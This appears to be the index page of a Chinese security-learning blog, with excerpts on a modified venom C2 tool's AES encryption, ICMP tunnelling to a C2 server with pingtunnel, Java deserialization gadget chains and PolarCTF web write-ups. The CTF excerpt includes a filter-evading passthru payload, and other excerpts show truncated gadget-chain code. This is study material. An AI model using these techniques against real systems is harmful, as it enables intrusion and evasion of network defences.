venom-crypt基于原版改动
venom-crypt基于原版改动原版 明文传输、自定义密钥的AES-CTR加密 原版非加密对比加密 命令数据包加密后增加16字节 修改版 密文传输、固定密钥00theway的AES-CTR加密 基于原版非加密传输数据包增加100字节 加密位置 myConn/aesCrypto.Encrypt() 123456789101112131415161718192021func aes256key() []byte { key := []byte("3b762cc137d55f4dcf4fe184ccc1dc15") //明文:00theway return key}func (hrc *AesCrypt) Encrypt(dst, plainText []byte) ([]byte, error) { block, err := aes.NewCipher(aes256key()) if err != nil { return nil, err } dst = make([]byte, aes.B...
隧道技术学习
隧道技术学习利用各种隧道技术,以网络防火墙允许的协议,绕过网络防火墙的封锁,实现访问被封锁的目标网络。 常用隧道技术网络层:IPv6 隧道、ICMP 隧道 传输层:TCP 隧道、UDP 隧道、常规端口转发 应用层:SSH 隧道、HTTP/S 隧道、DNS 隧道 协议判断命令ICMP:ping ip or domain HTTP:curl ip or domain SSH:ssh ip or domain DNS:nslookup domain TCP:telnet ip port 隧道应用C2server:192.168.5.31 Webserver:192.168.5.29,出网协议ICMP ICMP隧道工具:cs、pingtunnel Pingtunnel is a tool that send TCP/UDP traffic over ICMP 先在C2server启动pingtunnel服务端 1./pingtunnel -type server 然后在Webserver启动客户端,这里参数:-l是本地6666端口的流量,-s是转发到192.168...
Java反序列化(CommonsCollections6)
Commons-Collections6测试代码123456789101112131415161718192021222324252627282930313233343536373839404142434445import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections.functors.ConstantTransformer;import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.map.LazyMap;import org.apache.commons.collections4.keyvalue.TiedMapEntry;import java.io.*;import java.lan...
Java反序列化(CommonsCollections1)
Commons-Collections1cc链的第一条,准备记录的详细一点 测试代码还是和之前一样,先给出完整代码 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections.functors.ConstantTransformer;import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.map.TransformedMap;import java.io.*;import java.lang.annotation.T...
Java反序列化(URLDNS)
URLDNS链测试代码12345678910111213141516import java.io.FileInputStream;import java.io.IOException;import java.io.ObjectInputStream;public class UnserializeTest { public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{ ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename)); Object obj = ois.readObject(); return obj; } public static void main(String[] args) throws Exception{ unserializ...
Java反序列化(一)反射
反射在java反序列化中是常用到的一个东西 反射是什么反射就是java代码在JVM虚拟机中运行时,对于任意一个类可以动态获取他的class对象、属性、方法相关的信息 举个栗子正常情况下,我们在调用某一个类的方法,是先实例化一个类对象,然后对象.方法使用,像这样 12345678910111213class Person { String name="菜鸡"; public void learn(){ System.out.println("我是"+name); }}public class ReflectionLearn{ public static void main(String[] args) throws Exception { Person p = new Person(); p.learn(); }} 再利用反射调用,像这样 1234567891011121314class P...
PolarCTF 2023冬季挑战赛
2023冬季挑战赛cool(WEB)12345678910111213<?phpif(isset($_GET['a'])){ $a = $_GET['a']; if(is_numeric($a)){ echo "no"; } if(!preg_match("/flag|system|php/i", $a)){ eval($a); }}else{ highlight_file(__FILE__);}?> payload 1?a=passthru("cat fla\g.txt"); phpurl(WEB)base64解密aW5kZXgucGhwcw得到文件名index.phps 12345678910111213<?phpif("xxs"===$_GET[sys]) { echo("&...
记录一个反序列化中利用代码逻辑绕过__wakeup()函数的方法
记录一个反序列化中利用代码逻辑绕过__wakeup()函数的方法 题目代码123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960<?php error_reporting(0);class mouse{ public $rice; function __isset($n){ $this->rice->nothing(); }}class dog{ public $a; public $b; public $c; function __wakeup(){ $this->a = 'chance?'; } function __destruct(){ $this->b = $this->c; die($this->a); }...
